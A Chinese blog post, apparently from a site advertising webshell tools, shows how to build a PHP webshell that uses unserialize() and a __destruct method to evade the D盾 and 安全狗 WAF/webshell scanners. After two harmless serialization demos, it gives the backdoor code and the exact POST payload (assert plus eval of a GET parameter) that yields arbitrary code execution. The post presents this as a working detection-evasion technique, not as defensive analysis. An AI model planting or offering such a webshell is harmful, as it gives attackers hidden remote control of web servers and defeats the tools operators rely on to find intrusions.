会飞的鱼

首页 » web安全 » 利用PHP反序列化免杀D盾、安全狗等WAF软件

利用PHP反序列化免杀D盾、安全狗等WAF软件

PHP反序列化介绍

在PHP进行反序列化时,会将序列化中的变量传入类中,并且调用__destuct等魔法函数。巧妙应用可达到免杀D盾,过安全狗等WAF软件的效果。

TestCode1:

<?php
 
class A{
    public $name = 'xxxx';
    
    function __destruct(){
        echo $this->name;
    }
}
 
echo serialize(new A());
 
?>

输出:

xxxxO:1:"A":1:{s:4:"name";s:4:"xxxx";}

TestCode2:

<?php
 
class A{
    public $name = 'xxxx';
    
    function __destruct(){
        echo $this->name;
    }
}
 
unserialize('O:1:"A":1:{s:4:"name";s:9:"wogaosuni";}');
 
?>

输出:

wogaosuni

可以发现原来的变量已经被我们替换了。

利用反序列化写马绕过D盾等WAF

代码不做过多解释,啥子都能看明白

<?php
 
class A{
    public $name;
    public $male;
    
    function __destruct(){
        $a = $this->name;
        $a($this->male);
    }
}
 
unserialize($_POST['un']);
?>

POST传参传入

un=O:1:"A":2:{s:4:"name";s:6:"assert";s:4:"male";s:16:"eval($_GET["x"])";}

GET传参传入:

x=phpinfo();

效果

文章如无特别注明均为原创! 作者: admins, 转载或复制请以 超链接形式 并注明出处 Xise菜刀_Xise菜刀下载_中国菜刀_免杀大马_最新免杀大马
原文地址《 利用PHP反序列化免杀D盾、安全狗等WAF软件》发布于2019-8-14

分享到:
打赏

评论

游客

看不清楚?点图切换
切换注册

登录

您也可以使用第三方帐号快捷登录

切换登录

注册